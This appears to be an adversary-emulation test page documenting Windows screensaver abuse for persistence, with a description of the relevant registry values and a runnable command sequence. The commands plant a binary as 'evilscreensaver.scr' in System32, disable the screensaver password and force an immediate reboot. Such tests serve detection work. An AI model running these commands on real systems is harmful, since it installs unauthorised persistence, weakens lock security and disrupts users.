Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located inC:\Windows\System32\, andC:\Windows\sysWOW64\on 64-bit Windows systems, along with screensavers included with base Windows installations.The following screensaver settings are stored in the Registry (
HKCU\Control Panel\Desktop</code>) and could be manipulated to achieve persistence:
SCRNSAVE.exe- set to malicious PE pathScreenSaveActive- set to '1' to enable the screensaverScreenSaverIsSecure- set to '0' to not require a password to unlockScreenSaveTimeout- sets user inactivity timeout before screensaver is executedAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)
This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
Supported Platforms: Windows
Name
Description
Type
Default Value
input_binary
Executable binary to use in place of screensaver for persistence
path
C:\Windows\System32\cmd.exe
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0